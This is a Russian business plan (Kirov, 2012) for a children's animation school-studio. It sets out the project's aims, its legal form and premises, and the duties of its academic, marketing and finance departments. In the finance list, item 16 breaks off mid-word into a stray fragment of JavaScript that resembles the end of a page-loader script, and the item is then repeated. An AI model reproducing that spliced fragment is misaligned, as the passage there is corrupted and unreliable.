Организационная структура

Танцующая

Кисть

 

 

 

 

 

 

БИЗНЕСПЛАН

 

Детская

школа-студия

анимации

 

Над проектом работали

Протасова И., Плюснина О., Митрофанова Е., Седых А.

 

 

Киров 2012
Танцующая Кисть

школа-студия экранных искусств

Целью проекта является создание первой в городе школы-студии анимационных искусств, в которой дети в возрасте от семи до семнадцати лет смогут научиться самостоятельно рисовать и монтировать мультфильмы.

Социальная значимость проекта заключается в повышении нравственности и духовности молодежи с помощью анимационных и педагогических технологий.

Нами разработана учебная программа, направленная на всестороннее развитие личности ребенка, а благодаря исполь­зованию авторской техники анимации (живопись, совмещенная с 3D графикой), возрастает эффективность обучения изобразительному искусству, развивается пространственное мышление, чувство цвета и композиции.

В рамках учебной программы дети изучат основы теории и практики классической и современной анимации. За время обучения в школе, ребенок освоит весь технологический процесс создания полноценного мультфильма, включая монтаж картины и запись звуковой дорожки.

Помимо учебных занятий, студия анимации будет предоставлять услуги по созданию коммерческих и социальных рекламных роликов, презентаций и других анимационных продуктов как конечным заказчикам — юридическим лицам, так и посредникам — рекламным агентствам края.


Оглавление

1. Цели и задачи проекта

2. Организационный план

3. Маркетинговый план

4. Производственный план

5. Финансовый план


Цели и задачи проекта

Целью проекта является создание первой в городе школы-студии анимационных искусств, в которой дети в возрасте от семи до семнадцати лет смогут научиться самостоятельно рисовать и монтировать мультфильмы.

 

Задачи:

1) сформулировать долговременные и краткосрочные цели фирмы, стратегию и тактику их достижения;
2) изучить рынок, выявить конкурентов;
3) выбрать ассортимент услуг, которые будут предложены потребителям;
4) оценить производственные и непроизводственные издержки;
5) определить состав маркетинговых мероприятий по изучению рынка, стимулированию продаж, ценообразованию и т.п.;
6)оценить финансовое положение фирмы и соответствие имеющихся финансовых и материальных ресурсов возможностям достижения поставленной цели.


2. Организационный план

Организационная структура

1) Организационно-правовая форма – Общество с ограниченной ответственностью «Танцующая кисть», сокращенно ООО «Танцующая кисть».

2) Адрес – г.Киров, ул. Энгельса, 61

3) Площадь помещения – 57,2 кв.м.

               
   
 
   
Отдел маркетинга
 
Финансовый отдел
 

 


Функции и задачи отделов

Учебная часть осуществляет планирование, организацию, учет и контроль за ходом учебного процесса.

Учебную часть возглавляет заведующий, назначаемый на должность и освобождаемый приказом директора.

Основные задачи и функции учебной части:

1. Организация и контроль учебного процесса путем выполнения следующих функций:

а) составление графика учебного процесса;

б) составление расписания учебных занятий;

в) контроль оформления учебной документации.

2. Осуществляет учет движения учащихся.

3. Осуществляет контроль за отделом аниматоров, продюсерским центром, студией монтажа.

Отдел аниматоров отвечает за выбор технологии анимации мультфильма, художественное проектирование, мультипликацию персонажей.

Продюсерский центр осуществляет идейно- художественный контроль над постановкой мультфильма.

Студия монтажа выбирает технический вариант монтажа мультфильма, отвечает за монтаж по свету, по цвету, по композиции.

 

Отдел маркетинга является структурным подразделением в ООО «Танцующая кисть» и находится в непосредственном подчинении директору по маркетингу.

Функции отдела маркетинга:

1. Разработка плана маркетинга и его реализация. Осуществление контроля реализации стратегии и тактики маркетинга и полученных результатов.

2. Организация и проведение мероприятий по изучению и анализу общего состояния рынка и его участников, состояния спроса и предложений.

3. Сегментирование рынка, определение потребительских потребностей, оценка емкости и потенциала целевого рынка, а также прогнозирование тенденций его развития.

4. Изучение, анализ и прогнозирование (предупреждение, насколько это возможно) деловой активности конкурентов, их долей и позиций на рынке.

5. Изучение и анализ внутренних и внешних показателей собственной конкурентоспособности и эффективности хозяйственной деятельности Общества.

6. Определение потребностей и оценка возможностей Общества, разработка рекомендаций (мер) по обеспечению освоения новых рынков, формирования либо изменения структуры и системы предоставления услуг.

7. Разработка долгосрочных и текущих планов Общества в целом и отдельных направлений деятельности Общества, координация деятельности структурных подразделений по их реализации.

8. Участие в (или их разработка, разработка рекомендаций) создании коммерческих проектов и их реализации.

9. Участие в организации и проведении мероприятий и акций, направленных на продвижение (следует понимать: реклама и PR) , формирование устойчивого потребительского интереса (спроса) к продукции Общества.

10. Ведение информационной базы данных, полученных и обработанных в ходе проведения маркетинговых исследований и по результатам деятельности Отдела маркетинга.

 

Функции финансового отдела:
1. Осуществление единой политики предприятия в области финансов . Разработка финансовой стратегии предприятия и базы для его финансовой устойчивости.
2. Составление и предоставление руководству предприятия:
- сведений о поступлении денежных средств;
- отчетов о ходе выполнения финансовых, кредитных и кассовых планов;
- информации о финансовом состоянии предприятия;
3. Определение возможных финансовых рисков, их оценка применительно к каждому источнику средств. Разработка предложений по уменьшению финансовых рисков и программ по страхованию.
4. Организация финансовой деятельности предприятия с целью наиболее эффективного использования всех видов ресурсов в процессе производства и реализации продукции (работ, услуг) и получения максимальной прибыли.
5.Участие в подготовке проектов планов: реализации продукции (работ, услуг), капитальных вложений, научных исследований и разработок.
6. Определение и реализация инвестиционной политики, участие в работе по изысканию дополнительных инвестиционных и финансовых ресурсов.
7. Определение источников финансирования капитальных вложений. Разработка и утверждение плана капитальных вложений.
8. Определение порядка и условий финансирования капитального или текущего ремонта основных фондов, оформление предложений по отнесению расходов на себестоимость продукции.
9. Обеспечение своевременного поступления доходов.
10. Оформление финансово-расчетных и банковских операций в установленные сроки, включая предъявление в банки платежных требований, поручений и других расчетных документов, получение документов на отгрузку продукции, выписок счетов.
11. Разработка и осуществление мероприятий, способствующих своевременности платежей, выбор форм расчетов с контрагентами и обеспечение соблюдения правил ведения расчетов.
12. Обеспечение финансирования затрат, предусмотренных финансовыми планами, планами капитальных вложений.
13. Контроль за:
- выполнением финансовых планов и бюджета, планов реализации продукции, кредитных и кассовых планов, планов по прибыли и по иным финансовым показателям;
- прекращением производства продукции, не имеющей сбыта;
- правильным и эффективным расходованием денежных средств;
- целевым использованием собственных и заемных оборотных средств по структурным подразделениям и по предприятию в целом;
- соблюдением кассовой дисциплины;
правильностью составления, оформления и утверждения смет, расчетов окупаемости капитальных вложений.
14. Анализ производственно-хозяйственной и финансовой деятельности предприятия, прогнозирование результатов финансово-хозяйственной деятельности предприятия.
15. Разработка учетной и налоговой

16. Выработка кредитной поgetYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();

16. Выработка кредитной политики предприятия.
17. Обеспечение своевременности налоговых платежей, расчетов с кредиторами и поставщиками. Ведение учета движения финансовых средств и составление отчетности о результатах финансовой деятельности в соответствии со стандартами финансового учета и отчетности.

 


3. Маркетинговый план